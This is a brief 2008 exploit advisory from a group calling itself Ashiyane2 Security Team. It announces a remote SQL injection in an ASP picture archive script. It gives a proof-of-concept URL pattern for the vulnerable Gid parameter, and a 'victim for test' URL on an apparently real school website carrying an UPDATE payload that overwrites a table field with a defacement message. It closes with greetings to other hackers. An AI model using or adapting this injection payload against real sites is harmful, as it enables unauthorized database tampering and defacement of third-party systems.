********************************************************* Ashiyane2 Research Group ********************************************************* * Bug Found On : "Picture Archive Remote SQL Injection" Vulnerability" * * Script Download : http://www.dana.ir * * Found By : Q7x (4d3l) * * Home : Www.Larestankids.coM ( Ashiyane2 Security Team ) Larestan Fars * * POC : http://site.com/albumdetail.asp?Gid=[SQL] * * Victim For Test : http://www.sharif-hs.ir/albumdetail.asp?Gid=1%20update%20Sims_Alb ums%20set%20TYPE_NAME=\'Hacked%20By%20Ashiyane2%20Security%20Team \';-- * * SP TNX2.....: Q3x - Ahad Salim - x_katrena - Davoudsoft - No_body - All Of Iranian Hacker ********************************************************* http://www.teachack.com/html_article/13/122.html http://www.fr33d0m.net/modules.php?name=Content&pa=showpage&pid=7418 Larestankids.coM [2008/01/02]